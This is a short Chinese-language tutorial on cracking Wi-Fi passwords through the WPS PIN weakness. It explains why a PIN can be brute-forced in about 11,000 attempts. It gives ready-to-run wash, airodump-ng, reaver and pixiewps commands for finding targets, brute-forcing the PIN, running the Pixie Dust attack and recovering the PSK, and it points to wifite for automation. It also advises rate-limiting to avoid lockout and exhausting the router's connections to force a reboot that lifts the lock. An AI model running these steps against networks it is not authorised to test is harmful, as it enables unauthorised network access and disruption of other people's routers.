无线渗透_WPS攻击

WPS(WIRELESS PROTECTED SETUP)

  • WPS是WIFI联盟2006年开发的一项技术
    • 通过PIN码来简化无线接入的操作,无需记住PSK
    • 路由器和网卡各按一个按钮就能接入无线
    • PIN码是分为前后各4位的2段共8位数字
  • 安全漏洞
    • PSK:218,340,105,854,896
    • 2011年被发现安全涉及漏洞
    • 接入发起方可以根据路由器的返回信息判断前4位是否正确
    • 而PIN码的后4位只有1000种定义的组合(最后一位是checksum
    • 所以全部穷举破解只需要11000次尝试
    • 标准本身没有设计锁定机制,目前多个厂商已实现锁定机制



  • 包括Linksys在内的很多厂家的无线路由器无法关闭WPS功能
  • 即使在WEB界面中有关闭WPS,配置也不会生效
  • 攻击难度相对较低,防御却十分困难
  • 一般可在4-10小时内爆破密码
    • PSK
  • 用计算机直接算出PIN
    • C83A35
    • 00B00C


实际流程

  • 启动侦听模式后,发现支持WPS的AP
  • wash -i wlan0mon
    #或者
    airodump-ng wlan0mon
    --wps


  • 爆破PIN码
reaver -i wlan0mon -b <AP mac> -vv




  • 秒破PIN码
reaver -i wlan0mon -b <AP mac> -vv -K 1

pixiewps

  • 只是使用固定厂商的芯片,成功率很低


  • 得到PIN码之后就可以继续破解
reaver -i wlan0mon -b <AP mac> -vv -p  [PIN码]


问题:

  • 很多厂家实现了锁定机制,所以爆破时应注意限速
  • 一旦触发锁定,可尝试耗尽AP连接数,令其重启并解除WPS锁定


  • 综合自动化无线密码破解工具 wifite


  • 按住CRTL+C输入编号即可进行攻击




  • 等待之后就可以破解出来